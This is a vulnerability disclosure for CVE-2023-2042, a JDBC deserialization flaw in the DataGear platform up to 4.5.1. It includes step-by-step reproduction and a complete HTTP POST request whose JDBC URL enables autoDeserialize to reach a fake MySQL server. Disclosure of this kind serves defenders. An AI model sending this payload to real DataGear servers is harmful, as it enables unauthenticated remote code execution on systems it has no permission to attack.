Headline
CVE-2023-2042: ForCVE/2023-0x06.md at main · yangyanglo/ForCVE
A vulnerability, which was classified as problematic, has been found in DataGear up to 4.5.1. Affected by this issue is some unknown functionality of the component JDBC Server Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225920. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
Description: DataGear is an open source and free data visualization and analysis platform, free to create any data dashboard you want, and supports access to various data sources such as SQL, CSV, Excel, HTTP interface, and JSON. In Datagear 4.5.1 and earlier, an attacker can achieve jdbc deserialization attacks by uploading a vulnerable version of the mysql driver. After the upload is successful, an unauthenticated attacker can construct a malicious request to connect to a malicious JDBC server to trigger deserialization.
Version: datagear <= 4.5.1
Add:https://github.com/datageartech/datagear
Vulnerability recurrence:
1.login system. Upload the mysql driver with jdbc deserialization vulnerability version
2.Make URLDNS deserialized data
3.Set up mysql_fake server
4.Find the data source, select the driver we added, and fill in the payload that triggers the vulnerability(removing cookies can also trigger the vulnerability)
POST /schema/testConnection HTTP/1.1
Host: localhost:50401
Content-Length: 639
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost:50401
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:50401/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"id":"33141aada1873c584331","title":"test","url":"jdbc:mysql://127.0.0.1:3306/test?autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor","user":"root","password":"root","createUser":{"id":"admin","name":"admin","realName":"","email":"","admin":true,"anonymous":false,"createTime":"2023-04-01 18:15:08","nameLabel":"admin"},"createTime":"2023-04-01 18:23:50","driverEntity":{"id":"116f66f1e1873c530001","driverClassName":"com.mysql.cj.jdbc.Driver","displayName":"mysql-connector-java-8.0.12","displayText":"mysql-connector-java-8.0.12","displayDescMore":""},"properties":[],"dataPermission":99}
5.Connecting to a malicious JDBC server triggers deserialization